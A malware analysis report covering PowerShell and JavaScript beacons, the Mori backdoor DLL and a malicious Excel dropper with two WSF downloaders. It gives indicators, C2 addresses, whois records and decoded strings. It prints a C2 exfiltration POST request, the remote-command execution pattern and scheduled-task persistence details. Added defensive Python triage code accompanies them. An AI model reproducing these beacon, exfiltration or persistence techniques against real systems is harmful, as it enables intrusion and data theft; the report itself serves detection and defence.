OrgAbuseRef:    https://rdap.arin.net/registry/entity/GOLES88-ARIN

Relationships
192.210.191.188 Connected_From 5bcdd422089ed96d6711fa251544e2e863b113973db328590cfe0457bfeb564f
Description

Config.txt (9cb79736302999a7ec4151a43e93cd51c97ede879194cece5e46b4ff471a7af7) and Config2.txt (5bcdd422089ed96d6711fa251544e2e863b113973db328590cfe0457bfeb564f) attempt to connect to this IP address.

5bcdd422089ed96d6711fa251544e2e863b113973db328590cfe0457bfeb564f

Tags

trojan

Details
Name Config2.txt
Size 5037 bytes
Type ASCII text, with very long lines, with no line terminators
MD5 a16f4f0c00ca43d5b20f7bc30a3f3559
SHA1 94e26fb2738e49bb70b445315c0d63a5d364c71b
SHA256 5bcdd422089ed96d6711fa251544e2e863b113973db328590cfe0457bfeb564f
SHA512 e1f929029e7382e0a900fb3523dbc175d503b1903b034d88aed3e50aed768ce79c52091520e4a3e40c04e00ab70af3d438de35c79502ff8b11adcb45f6f666bd
ssdeep 96:ND25Bb2FNushsy1XSWSAIm0Rs1yjLzJ8f3zT+ujYa42g2QR4HElM+ejX+2jIQSgp:NKnCFvsLcIm0bfzAd4F6HEl92pSgoFu
Entropy 5.935676
Antivirus
ESET PowerShell/Agent.FP trojan
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships
5bcdd42208... Connected_To 192.210.191.188
Description

This file was identified as an encrypted PowerShell script; it contains a beacon to the following hardcoded IP address:



--Begin C2 IP address--

192[.]210[.]191[.]188

--End C2 IP address--



This file has capabilities similar to those of config.txt (ce9bd1acf37119ff73b4dff989f2791eb24efc891a413df58856d848f0bcaee9).

9ec8319e278d1b3fa1ccf87b5ce7dd6802dac76881e4e4e16e240c5a98f107e2

Details
Name AntheHannah_config.txt
Size 3491 bytes
Type data
MD5 51bc53a388fce06487743eadc64c4356
SHA1 b9e6fc51fa3940fb632a68907b8513634d76e5a0
SHA256 9ec8319e278d1b3fa1ccf87b5ce7dd6802dac76881e4e4e16e240c5a98f107e2
SHA512 43d291535b7521a061a24dc0fb1c573d1d011f7afa28e8037dea69eb5ae5bcd69b53a01a636e91827831066f9afc84efc1d556f64dc5cd780f9da79d38783b70
ssdeep 48:oJX/VlShMEtkDJrSYChZh60cIpoEzMPkQwpCUOfcUeHe0eGeBr8ONIPoUy3pIhwx:uStoJCXhbcIvgPkQw8rfcR+xjBrRUsT
Entropy 5.319055
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file was identified as an encrypted PowerShell script; it contains a beacon.



This file has capabilities similar to those of config.txt (ce9bd1acf37119ff73b4dff989f2791eb24efc891a413df58856d848f0bcaee9).

255e53af8b079c8319ce52583293723551da9affe547da45e2c1d4257cff625a

Details
Name TeresitaJordain_config.txt
Size 3580 bytes
Type data
MD5 0ac499496fb48de0727bbef858dadbee
SHA1 483cd5c9dd887367793261730d59178c19fe13f3
SHA256 255e53af8b079c8319ce52583293723551da9affe547da45e2c1d4257cff625a
SHA512 be0d181aabd07b122fcdb79a42ba43ed879a5f0528745447f2c93c6d9cb75c00f1d581520c640fd7f4a61a6f27ef82d99ad09ee2f1cc85340252a7eb7a9fa7a1
ssdeep 48:oHyk/BbLGAQUJaqQNMWyT1veKRzKykrSaowAQncpQNiqyC2V+mqoS3NwPK+2/t+Q:dyF1p7cKRzDbRBCUDP9X5NbfZJRQURC7
Entropy 5.296734
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships
255e53af8b... Connected_To 185.183.96.44
Description

This file was identified as an encrypted PowerShell script; it contains a beacon to the following hardcoded IP address:



--Begin C2 IP address--

185[.]183[.]96[.]44

--End C2 IP address--



This file has capabilities similar to those of config.txt (ce9bd1acf37119ff73b4dff989f2791eb24efc891a413df58856d848f0bcaee9).

185.183.96.44

Tags

command-and-control

Ports
  • 443 TCP
Whois

Queried whois.ripe.net with "-B 185.183.96.44"...



% Information related to '185.183.96.0 - 185.183.96.255'



% Abuse contact for '185.183.96.0 - 185.183.96.255' is 'abuse@hostsailor.com'



inetnum:        185.183.96.0 - 185.183.96.255

netname:        EU-HOSTSAILOR

descr:         HostSailor NL Services

country:        NL

admin-c:        AA31720-RIPE

tech-c:         AA31720-RIPE

status:         ASSIGNED PA

mnt-by:         MNT-HS

created:        2016-12-23T09:52:06Z

last-modified: 2016-12-23T09:52:06Z

source:         RIPE



person:         Ali Al-Attiyah

address:        Suite No: 1605, Churchill Executive Tower, Burf Khalifa Area

address:        Dubai P.O. Box 98362

address:        United Arab Emirates

phone:         +971 455 77 845

nic-hdl:        AA31720-RIPE

mnt-by:         MNT-HS

created:        2016-12-21T19:19:26Z

last-modified: 2019-03-18T14:07:12Z

source:         RIPE



% Information related to '185.183.96.0/24AS60117'



route:         185.183.96.0/24

descr:         EU-HOSTSAILOR 185.183.96.0/24

origin:         AS60117

mnt-by:         MNT-HS

created:        2016-12-23T09:50:04Z

last-modified: 2016-12-23T09:50:04Z

source:         RIPE

Relationships
185.183.96.44 Connected_From 255e53af8b079c8319ce52583293723551da9affe547da45e2c1d4257cff625a
Description

TeresitaJordain_config.txt (255e53af8b079c8319ce52583293723551da9affe547da45e2c1d4257cff625a) attempts to connect to this IP address.

e7f6c7b91c482c12fc905b84dbaa9001ef78dc6a771773e1de4b8eade5431eca

Details
Name HeidieLeone.txt
Size 706 bytes
Type ASCII text, with very long lines, with no line terminators
MD5 d68f5417f1d4fc022067bf0313a3867d
SHA1 2f6dd6d11e28bf8b4d7ceec8753d15c7568fb22e
SHA256 e7f6c7b91c482c12fc905b84dbaa9001ef78dc6a771773e1de4b8eade5431eca
SHA512 39023583902e616a196357a69ab31371842f3b6119914803b19e62388dc873ab02567ac398148f84c68adac6228a8cb4e83afb0be24bdf1603a618669030bf39
ssdeep 12:B6V3vKH/RRNyzV3vowKzV3voDPMV3v7SzV3vHzvm5V3vWQ52LgxxOWpgVEQgjVoL:sV3E/ozV3pKzV3GPMV3OzV3j4V3OQ4sI
Entropy 5.145602
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships
e7f6c7b91c... Connected_To 185.117.75.34
Description

This file was identified as an encrypted PowerShell script; it contains a beacon to the following hardcoded IP address:



--Begin C2 IP address--

185[.]117[.]75[.]34

--End C2 IP address--



This file has capabilities similar to those of config.txt (ce9bd1acf37119ff73b4dff989f2791eb24efc891a413df58856d848f0bcaee9).

b1e30cce6df16d83b82b751edca57aa17795d8d0cdd960ecee7d90832b0ee76c

Tags

trojan

Details
Name note.js
Size 3235 bytes
Type ASCII text, with very long lines, with CRLF line terminators
MD5 c0c2cd5cc018e575816c08b36969c4a6
SHA1 47a4e0d466bb20cec5d354e56a9aa3f07cec816a
SHA256 b1e30cce6df16d83b82b751edca57aa17795d8d0cdd960ecee7d90832b0ee76c
SHA512 4b930da1435a72095badaeca729baca8d6af9ab57607e01bd3dd1216eee75c8f8b7981a92640d475d908c6f22811900133aed8ab8513c38f5bc82b60752bf929
ssdeep 96:/r9/hIgY/5N8s2Q5bQRWs4uQ5WQRWumVxE1Fq:T9/hILLdpG4Rdmwq
Entropy 5.200319
Antivirus
NANOAV Trojan.Script.Heuristic-js.iacgm
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships
b1e30cce6d... Connected_To 185.118.164.21
Description

This file is a JavaScript file that contains a PowerShell beacon for a GET request to:



--Begin GET request--

185[.]118[.]164[.]21:80/index?param=<computer_name>/<username>

--End GET request--



The JavaScript is launched using the native file “WScript.exe”. The manifestation function builds the parameters for the GET request to 185[.]118[.]164[.]21 and creates the scheduled task (Figure 7 and Figure 8).



As a persistence mechanism, the manifestation function also copies the file to the user’s Contacts folder and sets a Scheduled Task to recur daily at 10:01 AM, which relaunches the PowerShell beacon to 185[.]118[.]164[.]21 (Figure 9).

Screenshots

Figure 7 - Screenshot of the main code for the JavaScript.

Figure 8a - Screenshot of the network beacon.

Figure 8b - Screenshot of the network beacon.

Figure 9 - Screenshot of the malware creating a task.

Figure 10a - Screenshot of the command being executed.

Figure 10b - Screenshot of the command being executed.

185.118.164.21

Tags

command-and-control

URLs
  • 185.118.164.21/index?param=<computer_name>/<username>
Ports
  • 80 TCP
Whois

Queried whois.ripe.net with "-B 185.118.164.21"...



% Information related to '185.118.164.0 - 185.118.165.255'



% Abuse contact for '185.118.164.0 - 185.118.165.255' is 'abuse@profitserver.ru'



inetnum:        185.118.164.0 - 185.118.165.255

netname:        RU-CHELYABINSK-SIGNAL-20150923

country:        RU

admin-c:        AN29881-RIPE

tech-c:         AN29881-RIPE

status:         ASSIGNED PA

mnt-by:         ru-chelyabinsk-signal-1-mnt

created:        2016-10-12T10:22:21Z

last-modified: 2016-10-12T10:22:21Z

source:         RIPE



person:         Alexey Nevolin

address:        Ordzhonikidze str., 54-B

address:        454091

address:        Chelyabinsk

address:        RUSSIAN FEDERATION

phone:         +7 3517299971

nic-hdl:        AN29881-RIPE

mnt-by:         ru-chelyabinsk-signal-1-mnt

created:        2015-09-18T15:23:57Z

last-modified: 2015-09-18T15:23:58Z

source:         RIPE



% Information related to '185.118.164.0/24AS44493'



route:         185.118.164.0/24

descr:         Chelyabinsk-Signal

origin:         AS44493

mnt-by:         ru-chelyabinsk-signal-1-mnt

created:        2015-11-17T05:53:42Z

last-modified: 2015-11-17T05:53:42Z

source:         RIPE

Relationships
185.118.164.21 Connected_From b1e30cce6df16d83b82b751edca57aa17795d8d0cdd960ecee7d90832b0ee76c
185.118.164.21 Connected_From 42ca7d3fcd6d220cd380f34f9aa728b3bb68908b49f04d04f685631ee1f78986
Description

note.js (b1e30cce6df16d83b82b751edca57aa17795d8d0cdd960ecee7d90832b0ee76c) and rj.js (42ca7d3fcd6d220cd380f34f9aa728b3bb68908b49f04d04f685631ee1f78986) connected to this IP address.

42ca7d3fcd6d220cd380f34f9aa728b3bb68908b49f04d04f685631ee1f78986

Tags

backdoor

Details
Name rj.js
Size 5257 bytes
Type ASCII text, with very long lines
MD5 37fa9e6b9be7242984a39a024cade2d5
SHA1 0211569091b96cffab6918e18ccc97f4b24d88d4
SHA256 42ca7d3fcd6d220cd380f34f9aa728b3bb68908b49f04d04f685631ee1f78986
SHA512 889f293af25aa3af14c580000f15ade58e5b6b6000f42ddf38b69fd74a663b4c92cc2a90bfc9804d9de194e1eeee734f0b9e0ea5838afbc09f6fa3bfb3f5891c
ssdeep 96:ub0werybmdzpcY3EUCGYZoTuEDdEyh8G2ng7qci1yMA1h5+N:ub09ymdzpcY3BOZIDmyh8G2ntci1P856
Entropy 5.422642
Antivirus
Emsisoft JS.Heur.Backdoor.2.BA440290.Gen (B)
Lavasoft JS.Heur.Backdoor.2.BA440290.Gen
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships
42ca7d3fcd... Connected_To 185.118.164.21
Description

This file is a heavily obfuscated JavaScript file with encoded values; it contains a PowerShell beacon that issues a GET request to:



--Begin GET request--

185[.]118[.]164[.]21:80/index?param=<computer_name>/<username>

--End GET Request--



This file performs the same tasks as "note.js" (b1e30cce6df16d83b82b751edca57aa17795d8d0cdd960ecee7d90832b0ee76c). It is launched using the native file “WScript.exe”; rj.js gains persistence by copying itself to the user’s Contacts folder and creating a Scheduled Task that relaunches the PowerShell script daily at 10:01 AM.
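The persistence and beacon traits shared by note.js and rj.js above (a daily Scheduled Task at 10:01 that relaunches WScript.exe on a copy in the user's Contacts folder, and a GET to 185[.]118[.]164[.]21/index?param=<computer_name>/<username>), as an added triage example that is not code from the report. The task XML is constructed to match the report's description; the task start date, user name and file path inside it are placeholders, and the report does not give the task name.

```python
"""Triage of the note.js / rj.js persistence and beacon described above.

Added example; this is not code from the report. The task XML is constructed
to match the report's description (daily trigger at 10:01, WScript.exe
relaunching the copy in the user's Contacts folder). The date, user name and
file path inside it are placeholders, not values from the report.
"""
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs, urlsplit

C2_HOST = "185.118.164.21"
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Constructed sample in the shape of `schtasks /Query /XML` output.
SAMPLE_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <CalendarTrigger>
      <StartBoundary>2021-11-01T10:01:00</StartBoundary>
      <Enabled>true</Enabled>
      <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>wscript.exe</Command>
      <Arguments>"C:\Users\user01\Contacts\note.js"</Arguments>
    </Exec>
  </Actions>
</Task>"""


def suspicious_task(xml_text):
    """Flag the two traits the report gives for the scheduled task:
    a daily calendar trigger at 10:01 and a WScript.exe action that
    runs a .js file out of a Contacts folder."""
    root = ET.fromstring(xml_text)
    hits = {"daily_1001": False, "wscript_contacts_js": False}
    for trig in root.findall(".//t:CalendarTrigger", NS):
        start = trig.findtext("t:StartBoundary", default="", namespaces=NS)
        if trig.find("t:ScheduleByDay", NS) is not None and start.endswith("T10:01:00"):
            hits["daily_1001"] = True
    for act in root.findall(".//t:Exec", NS):
        cmd = act.findtext("t:Command", default="", namespaces=NS).lower()
        args = act.findtext("t:Arguments", default="", namespaces=NS).lower().strip('"')
        if cmd.endswith("wscript.exe") and "\\contacts\\" in args and args.endswith(".js"):
            hits["wscript_contacts_js"] = True
    return hits


def parse_beacon(url):
    """Recognise the GET beacon 185.118.164.21:80/index?param=<computer_name>/<username>
    in a proxy or firewall log URL and pull the two identifiers out of it.
    Returns None for anything that does not fit the pattern."""
    if "://" not in url:            # log sources often drop the scheme
        url = "http://" + url
    u = urlsplit(url)
    if u.hostname != C2_HOST or u.path != "/index":
        return None
    param = parse_qs(u.query).get("param", [""])[0]
    computer_name, _, username = param.partition("/")
    if not computer_name or not username:
        return None
    return {"computer_name": computer_name, "username": username}
```

Export every task with `schtasks /Query /XML ONE` and feed each definition to `suspicious_task`; a task that trips both checks is the persistence described above, while one that trips only `daily_1001` needs a look at its action. `parse_beacon` is meant for URL fields in proxy logs, where the host and username it returns identify the infected machine directly.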

3098dd53da40947a82e59265a47059e69b2925bc49c679e6555d102d1c6cbbc8

Tags

backdoor

Details
Name FML.dll
Size 210397496 bytes
Type PE32+ executable (DLL) (GUI) x86-64, for MS Windows
MD5 0431445d6d6e5802c207c8bc6a6402ea
SHA1 3765c1ad8a1d936aad88255aef5d6d4ce24f94e8
SHA256 3098dd53da40947a82e59265a47059e69b2925bc49c679e6555d102d1c6cbbc8
SHA512 f46d71a66aa615efdcec37ff282201695f6216a8903a83edee874ced321b8a090baf1054e77bd3ed642e5da60522ea245e1741726fc4b49ccbef11203f5790bf
ssdeep 3145728:LFiQ9FiQ9FiQ9FiQ9FiQ9FiQ9FiQ9FiQ9FiQ9FiQ9FiQ9FiQ9FiY:AQyQyQyQyQyQyQyQyQyQyQyQyY
Entropy 7.999913
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date 2020-01-20 09:19:24-05:00
Import Hash 3bcc46e3f517ddf9666020895796153f
PE Sections
MD5 Name Raw Size Entropy
fea26576aaf64f90e067892d07fb8f97 header 1024 3.335479
11cc597cf11ee87c3a0f76dcecf7556a .text 468992 6.420810
52f5c458bae1ec48fc650d0975663910 .rdata 167936 4.843554
f7a88a7f326a63079052f1884b57e3a8 .data 11264 4.040157
c2b5de9421b4a0c9b7d4688f4ae051ac .pdata 25088 5.777552
1f354d76203061bfdd5a53dae48d5435 .tls 512 0.020393
37b679e67208f1af8eed89301450017a .rsrc 209716224 8.000000
ef43c49686a0f7100f95a3dfa50d84ea .reloc 5120 5.322063
Description

This file has been identified as a Mori backdoor. The file is a DLL written in C++ that is executed with regsvr32.exe, which calls its DllRegisterServer export; it appears to be a component of another program. FML.dll carries approximately 200MB of junk in resource directory 205, number 105, which is the near-maximal-entropy .rsrc section in the section table above. Upon execution, FML.dll creates the mutex 0x50504060 and performs the following tasks:



- Deleting the file FILENAME.old, where FILENAME is the name of the DLL itself, and deleting a file whose name is read from a registry value (Figure 13).

- Resolving networking APIs from strings that are ADD-encrypted with the key 0x05 (byte-wise addition of 0x05, undone at runtime before each name is resolved).

- Using Base64 and JSON, based on certain key values passed to the JSON library functions; JSON most likely serializes C2 commands and/or their results.

- For C2 communication, using HTTP over either IPv4 or IPv6, depending on the value of an unidentified flag.

- Reading and/or writing data in the registry keys HKLM\Software\NFC\IPA and HKLM\Software\NFC\(Default) (Figure 14).
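Two static triage checks suggested by the FML.dll description above, as an added example that is not code from the report: a section-table heuristic for the ~200MB of junk (a single section holding almost the whole file at entropy 8.0), and a decoder for the ADD-0x05 string obfuscation behind the API resolution. The section figures are the ones printed in the PE Sections table above. The encoded buffer is constructed for illustration and the API names in it are placeholders: the report says the sample resolves networking APIs from such strings but does not list them. The decode direction (stored byte = plaintext + 0x05) is the usual reading of "ADD-encrypted with the key 0x05" and is an assumption.

```python
"""Two static triage checks for FML.dll (Mori) described above.

Added example; not code from the report. The section table is copied from
the PE Sections list above. The ADD-encoded buffer is constructed for
illustration and the API names in it are placeholders: the report says the
sample resolves networking APIs from ADD-0x05 strings but does not list them.
"""

# (name, raw size, entropy) from the FML.dll section table above.
FML_SECTIONS = [
    ("header", 1024, 3.335479),
    (".text", 468992, 6.420810),
    (".rdata", 167936, 4.843554),
    (".data", 11264, 4.040157),
    (".pdata", 25088, 5.777552),
    (".tls", 512, 0.020393),
    (".rsrc", 209716224, 8.000000),
    (".reloc", 5120, 5.322063),
]


def padded_sections(sections, min_share=0.9, min_entropy=7.9):
    """Return (name, share_of_file) for sections that hold almost the whole
    file at near-maximal entropy. One such section next to a normal-sized
    .text is the footprint of junk padding added to defeat size limits on
    scanners and sandboxes, so the real code is the small remainder."""
    total = sum(size for _, size, _ in sections)
    return [(name, size / total) for name, size, ent in sections
            if size / total >= min_share and ent >= min_entropy]


def add_decode(data, key=0x05):
    """Undo byte-wise ADD encoding: stored = (plain + key) & 0xFF.
    Assumption: 'ADD-encrypted with the key 0x05' means the stored bytes
    are the plaintext plus 0x05; if the sign is the other way, pass key=-0x05."""
    return bytes((b - key) & 0xFF for b in data)


def add_encode(data, key=0x05):
    return bytes((b + key) & 0xFF for b in data)


def find_encoded_strings(blob, key=0x05, min_len=6):
    """Decode a whole buffer and keep printable runs of at least min_len.
    This is the static counterpart of the sample's runtime resolver: the
    malware decodes one name and resolves it (typically via GetProcAddress);
    here everything is decoded and whatever looks like an identifier is kept."""
    found, run = [], bytearray()
    for b in add_decode(blob, key):
        if 0x20 <= b < 0x7F:
            run.append(b)
            continue
        if len(run) >= min_len:
            found.append(run.decode("ascii"))
        run = bytearray()
    if len(run) >= min_len:
        found.append(run.decode("ascii"))
    return found


# Constructed buffer: two placeholder API names ADD-encoded with 0x05,
# surrounded by bytes that do not decode to printable text.
SAMPLE_BLOB = (b"\x00\x00" + add_encode(b"WinHttpOpen") + b"\x00"
               + add_encode(b"WinHttpSendRequest") + b"\x00MZ\x90\x00")
```

On the real sample, point `find_encoded_strings` at the .rdata and .data section bytes rather than the whole file; the 200MB .rsrc section only adds noise, and a practitioner would strip or ignore it before any other static work.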

Screenshots

Figure 11 - Screenshot of the mutex.

Figure 12 - Screenshot of the exports.

Figure 13 - Screenshot of the malware deleting the file FILENAME.old and deleting the file by registry value.

Figure 14 - Screenshot of the deleted Registry Keys.

026868713d60e6790f41dc7046deb4e6795825faa903113d2f22b644f0d21141

Tags

downloader
dropper
loader
trojan

Details
Name Cooperation terms.xls
Size 252928 bytes
Type Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: pc, Last Saved By: interstellar, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Sep 29 20:38:56 2021, Last Saved Time/Date: Mon Oct 4 07:32:17 2021, Security: 0
MD5 b0ab12a5a4c232c902cdeba421872c37
SHA1 a8e7659942cc19f422678181ee23297efa55fa09
SHA256 026868713d60e6790f41dc7046deb4e6795825faa903113d2f22b644f0d21141
SHA512 c1ff4c3bd44e66e45cdb66b818a963d641cde6b9ea33ac64374929f182cd09e944d9337a588ba99d3df98190ba979431d015d848aa09c2d93763a1ed795ff304
ssdeep 6144:Lk3hOdsylKlgryzc4bNhZF+E+W2knAcYi4uU4pVZ8lx+tSeJBWC:5iLZpVZ8lx+tn3WC
Entropy 7.167960
Antivirus
Antiy Trojan[Downloader]/MSOffice.Agent.pmk
Bitdefender Trojan.Generic.30623170
ESET VBS/Agent.PMK trojan
Emsisoft Trojan.Generic.30623170 (B)
IKARUS Trojan.VBS.Agent
Lavasoft Trojan.Generic.30623170
McAfee RDN/Sagent
NANOAV Trojan.Ole2.Vbs-heuristic.druvzi
Quick Heal X97M.Trojan.Agent.45255
Sophos Troj/DocDl-AEVH
Symantec Trojan.Mdropper
Trend Micro Possibl.564B8E70
Trend Micro HouseCall Possibl.564B8E70
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships
026868713d... Dropped c2badcdfa9b7ece00f245990bb85fb6645c05b155b77deaf2bb7a2a0aacbe49e
026868713d... Dropped f10471e15c6b971092377c524a0622edf4525acee42f4b61e732f342ea7c0df0
Description

This artifact is a malicious Excel file that contains macros written in Visual Basic for Applications (VBA) and two encoded wsf files. When the Excel file is opened, the victim will be prompted to enable macros with the “Enable Content” button. The macros are executed once the victim enables content. When executed, the macros decode and install the embedded wsf files into the directories below:



--Begin files--

"%AppData%\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Outlook.wsf"

"C:\ProgramData\Outlook.wsf"

--End files--

Screenshots

Figure 15 - The contents of the Excel file.

Figure 16 - The contents of the macros used to decode and install the embedded wsf files on the compromised system.

c2badcdfa9b7ece00f245990bb85fb6645c05b155b77deaf2bb7a2a0aacbe49e

Tags

downloader
loader
trojan

Details
Name Outlook.wsf
Size 11692 bytes
Type HTML document, Little-endian UTF-16 Unicode text, with CRLF line terminators
MD5 e182a861616a9f12bc79988e6a4186af
SHA1 69840d4c4755cdab01527eacbb48577d973f7157
SHA256 c2badcdfa9b7ece00f245990bb85fb6645c05b155b77deaf2bb7a2a0aacbe49e
SHA512 0eb88fe297d296569063874bead48c8b2998edc6779f5777f533de241fa49d7cb4aadc189bcdd07783ad2d669ac35344b2385c62859bc5b0c6fbe55e4857002b
ssdeep 192:qK8Lkrc2HWT1jbAaBLGFNN68RNEFQQrrl+lBAlJlgQGtb0UqQYGQrQoGuQgQXPY5:qK82ZWTd/LYNBRNEFl+l2lJlGdPUlcKp
Entropy 4.062618
Path %AppData%\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Outlook.wsf
Antivirus
Avira VBS/Dldr.Agent.HC
Bitdefender Trojan.Generic.31341871
ESET VBS/Agent.PMK trojan
Emsisoft Trojan.Generic.31341871 (B)
IKARUS Trojan.VBS.Agent
Lavasoft Trojan.Generic.31341871
McAfee VBS/Agent.hw
Quick Heal VBS.Downloader.45256
Sophos Troj/HTA-AB
Symantec VBS.Downloader.Trojan
Trend Micro TROJ_FR.A1B65C22
Trend Micro HouseCall TROJ_FR.A1B65C22
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships
c2badcdfa9... Dropped_By 026868713d60e6790f41dc7046deb4e6795825faa903113d2f22b644f0d21141
Description

This artifact is a wsf file installed by Cooperation terms.xls (026868713d60e6790f41dc7046deb4e6795825faa903113d2f22b644f0d21141). This file is installed into the current user startup folder to run automatically at startup. The file contains hexadecimal (hex)-encoded strings that have been reshuffled. When executed, the malware uses built-in algorithms to arrange and hex decode these strings.



Displayed below are strings of interest decoded during runtime:



--Begin strings--

"okppQO4Hbr0n3PBQt78IQhFQlIvXjWRu.run PprJwVD1jVboW9s2WjL9uCH1Jk02tisB,0,TRUE"

"cmd.exe /c cscript.exe %ProgramData%\\Outlook.wsf jaguar_plus"

--End strings--



It executes the command below to run the wsf file "%ProgramData%\Outlook.wsf" (f10471e15c6b971092377c524a0622edf4525acee42f4b61e732f342ea7c0df0) with the argument "jaguar_plus".



Displayed below is the command:



--Begin command--

"cmd.exe /c cscript.exe %ProgramData%\\Outlook.wsf jaguar_plus"

--End command--

Screenshots

Figure 17 - The contents of the VBscript.

f10471e15c6b971092377c524a0622edf4525acee42f4b61e732f342ea7c0df0

Tags

downloader
loader
trojan

Details
Name Outlook.wsf
Size 34242 bytes
Type HTML document, Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
MD5 b3504546810e78304e879df76d4eec46
SHA1 d02d93b707ac999fde0545792870a2b82dc3a238
SHA256 f10471e15c6b971092377c524a0622edf4525acee42f4b61e732f342ea7c0df0
SHA512 d7a78259988e17b1487a3cc2a3a8ba7aaa1cae8904b2ee3da79a6a77266822f726a367cda9c1b59aab3cf369ebf5bec1f279e8e6ff036376073f8a20e3053576
ssdeep 384:NaeE4zZlbO1/RW8upzK2Hkq3+LBOuCBSnUosLCFt9tMRYCnFCg+tJCXw2V3:NaeEpu9VEU+LQEsMt9tUl+ta
Entropy 3.699753
Path C:\ProgramData\Outlook.wsf
Antivirus
Avira JS/Dldr.Agent.bah
IKARUS JS.Trojan-Downloader.Agent
McAfee VBS/Downloader.aak
NANOAV Trojan.Script.Vbs-heuristic.druvzi
Quick Heal VBS.Downloader.45256
Sophos Troj/HTA-AB
Symantec Trojan Horse
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships
f10471e15c... Dropped_By 026868713d60e6790f41dc7046deb4e6795825faa903113d2f22b644f0d21141
f10471e15c... Connected_To 88.119.170.124
Description

This artifact is a wsf file installed by Cooperation terms.xls (026868713d60e6790f41dc7046deb4e6795825faa903113d2f22b644f0d21141) and executed by Outlook.wsf (c2badcdfa9b7ece00f245990bb85fb6645c05b155b77deaf2bb7a2a0aacbe49e). The file contains hex-encoded strings that have been reshuffled. When executed, the malware uses built-in algorithms to arrange and hex decode these strings.



Displayed below are strings of interest decoded during runtime:



--Begin strings--

{impersonationLevel=impersonate}!\\\\

%AppData%\\Local\\Temp\\h.txt

ezedcjrfvjriftmldedu

lcekcnkxkbllmwlpoklgof

http[:]//88[.]119[.]170[.]124/

POST

E442779124B3E37D2A3F77D77B66A.Open H9C223C34C88AD14FAD121E5E9C968,FFCC6585A837E41D4D73CB795EA25,False

E442779124B3E37D2A3F77D77B66A.send H9C223C34C88AD14FAD121E5E9C968

cmd.exe /c

>> %temp%\\h.txt

Select * from Win32_IP4RouteTable

"%COMPUTERNAME%"

"%USERNAME%"

--End strings--



It collects the victim's system IP address, computer name, and username in the format below:



--Begin information--

Format: [victim's system Internet Protocol address]|#@*@#|[Computer name]/Username

Sample: "19x.1xx.2xx.2xx|#@*@#|WIN-HVMLL1IR74C/user01"

--End information--



The collected data above is hex-encoded, and the hex bytes are reshuffled and appended to a string "vl" before exfiltration. It will send the encoded data using the Uniform Resource Identifier (URI): "http[:]//88[.]119[.]170[.]124/ezedcjrfvjriftmldedu" and wait for a response.



Displayed below is the POST request used to exfiltrate the victim's system data:



--Begin request--

POST /ezedcjrfvjriftmldedu HTTP/1.1

Connection: Keep-Alive

Content-Type: application/x-www-form-urlencoded; Charset=UTF-8

Accept: */*

Accept-Language: en-us

User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

CharSet: UTF-8

Content-Length: 93

Host: 88[.]119[.]170[.]124



vl=1693273632E6349334E37235340D743442D53463ED34C7CC2214A90423C5494228E4F7032293856253E6216713

--End request---



The response payload was not available for analysis. Analysis indicates that the C2 response payloads are hex encoded and reshuffled. It uses the same built-in algorithm to arrange and hex decode these payloads, which contain command-line scripts. The malware will search for the string "|#@*@#|" or "/!*##*!/" in the decoded payload. If the payload contains one of these strings, it will parse the command-line scripts for execution using the command below:



--Begin command--

"cmd.exe /c [decoded command scripts]| >> %temp%\\h.txt"

--End command--



The output of the command-line scripts executed is stored in the text file "%temp%\h.txt". The malware reads the command output back from "%temp%\h.txt" and appends it to the victim's system IP address, computer name, and username in the format below:



--Begin format--

Format: "[victim's system Internet Protocol address]|#@*@#|[Computer name]/Username|#@*@#|[Output of the command executed]"



Sample observed: "19x.1xx.2xx.2xx|#@*@#|WIN-HVMLL1IR74C/user01|#@*@#|\r\nWindows IP Configuration\r\n\r\n\r\nEthernet adapter Local Area Connection 2:\r\n\r\n Connection-specific DNS Suffix . : \r\n Link-local IPv6 Address . . . . . : fe80::d1d7:d838:2959:23d0%15\r\n IPv4 Address. . . . . . . . . . . : 19x.1xx.2xx.1xx\r\n Subnet Mask . . . . . . . . . . . : 255.255.255.0\r\n Default Gateway . . . . . . . . . : 19x.1xx.2xx.2xx\r\n\r\nEthernet adapter Local Area Connection:\r\n\r\n Media State . . . . . . . . . . . : Media disconnected\r\n Connection-specific DNS Suffix . : \r\n\r\nTunnel adapter isatap.{62D6C817-FD7E-4634-83CF-3311F44F4490}:\r\n\r\n Media State . . . . . . . . . . . : Media disconnected\r\n Connection-specific DNS Suffix . : \r\n\r\nTunnel adapter Teredo Tunneling Pseudo-Interface:\r\n\r\n Connection-specific DNS Suffix . : \r\n IPv6 Address. . . . . . . . . . . : 2001:0:c000:27b:c2f:3a2f:3f57:2e63\r\n Link-local IPv6 Address . . . . . : fe80::c2f:3a2f:3f57:2e63%12\r\n Default Gateway . . . . . . . . . : ::\r\n\r\nTunnel adapter isatap.{43E8EDE4-433A-453E-B583-1A994D8B33E2}:\r\n\r\n Media State . . . . . . . . . . . : Media disconnected\r\n Connection-specific DNS Suffix . : \r\n"

--End format--



The victim's system information above and the output of the command executed are hex-encoded, and the hex bytes are re-ordered and appended to a string "vl" before exfiltration. It will send the encoded data using the URI: "http[:]//88[.]119[.]170[.]124/lcekcnkxkbllmwlpoklgof" and wait for a response (next command).



